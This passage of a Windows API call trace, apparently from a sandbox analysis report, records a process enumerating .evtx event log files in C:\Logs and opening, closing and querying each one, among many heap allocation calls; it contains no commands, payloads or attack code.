cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx", lpUsedDefaultChar=0x0) returned 41 [0087.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.147] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.147] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.147] AreFileApisANSI () returned 1 [0087.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0087.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x678a0 [0087.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x678a0, cchWideChar=41 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 41 [0087.147] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.148] GetFileType (hFile=0x424) returned 0x1 [0087.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x678a0 | out: hHeap=0x20000) returned 1 [0087.148] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.148] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.148] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.148] CloseHandle (hObject=0x424) returned 1 [0087.148] AreFileApisANSI () returned 1 [0087.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0087.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67240 [0087.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67240, cchWideChar=41 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 41 [0087.149] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.149] GetFileType (hFile=0x424) returned 0x1 [0087.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67240 | out: hHeap=0x20000) returned 1 [0087.149] CloseHandle (hObject=0x424) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0087.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0087.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0087.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0087.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0087.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0087.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0087.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0087.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0087.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0087.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0087.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0087.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0087.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0087.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0087.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0087.150] AreFileApisANSI () returned 1 [0087.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0087.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x678a0 [0087.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x678a0, cchWideChar=41 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 41 [0087.150] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x678a0 | out: hHeap=0x20000) returned 1 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.150] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cAlternateFileName="MI6AFE~1.EVT")) returned 1 [0087.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0087.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d0d0 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0087.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d028 [0087.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0087.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0087.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0087.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0087.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0087.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0087.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0087.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x811e8 [0087.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0087.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0087.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.151] AreFileApisANSI () returned 1 [0087.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", lpUsedDefaultChar=0x0) returned 83 [0087.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0087.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0087.151] AreFileApisANSI () returned 1 [0087.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0087.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0087.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=83 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 83 [0087.152] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.152] GetFileType (hFile=0x424) returned 0x1 [0087.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0087.152] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.152] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.152] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.152] CloseHandle (hObject=0x424) returned 1 [0087.153] AreFileApisANSI () returned 1 [0087.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0087.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0087.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x60138, cchWideChar=83 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 83 [0087.153] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.153] GetFileType (hFile=0x424) returned 0x1 [0087.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0087.153] CloseHandle (hObject=0x424) returned 1 [0087.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0087.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0087.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0087.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0087.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0087.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0087.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0087.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0087.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cc38 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cc38 | out: hHeap=0x20000) returned 1 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0087.154] AreFileApisANSI () returned 1 [0087.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0087.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x5f008, cchWideChar=83 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 83 [0087.154] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.154] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-ReadyBoost%4Operational.evtx", cAlternateFileName="MIB9D2~1.EVT")) returned 1 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0087.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.155] AreFileApisANSI () returned 1 [0087.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx", lpUsedDefaultChar=0x0) returned 55 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0087.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0087.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.156] AreFileApisANSI () returned 1 [0087.156] 